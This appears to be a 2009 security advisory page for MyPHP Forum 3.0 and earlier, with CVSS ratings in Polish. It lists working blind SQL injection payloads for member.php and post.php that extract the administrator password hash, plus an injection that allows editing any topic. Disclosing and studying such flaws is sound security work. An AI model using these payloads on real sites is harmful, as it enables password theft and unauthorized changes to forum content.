MyPHP Forum <= 3.0 Edit Topics/Blind SQL Injection Vulnerabilities

2009-05-02 / 2009-05-03
Credit: StAkeR
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 5.1/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 4.9/10
Wymagany dostęp: Zdalny
Złożoność ataku: Wysoka
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

/* ----------------------------------------------------------------------------------- MyPHP Forum (Final) <= 3.0 (Edit Topics/Blind SQL Injection) Remote Vulnerabilities ----------------------------------------------------------------------------------- Discovered By StAkeR[at]hotmail[dot]it Download On http://www.myphp.ws/ - member.php (confirm - Blind SQL Injection) - member.php?action=confirm&id=' or ascii(substring((select password from nb_member where uid=1),1,1))=98/* - member.php (newconfirm - Blind SQL Injection) - member.php?action=newconfirm&user=' or ascii(substring((select password from nb_member where uid=1),1,1))=98-- - member.php?action=reqpwd (reqpwd - Blind SQL Injection) - insert ' or ascii(substring((select password from nb_member where uid=1),1,1))=98# - post.php (post Blind SQL Injection) - post.php?action=post&fid=1&tid=1&quote=' or ascii(substring((select password from nb_member where uid=1),1,1))=9%23 - post.php (edit - Edit Topics) - post.php?action=edit&fid=1&tid=1&pid=[id topic] ' or '1=1 /*


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top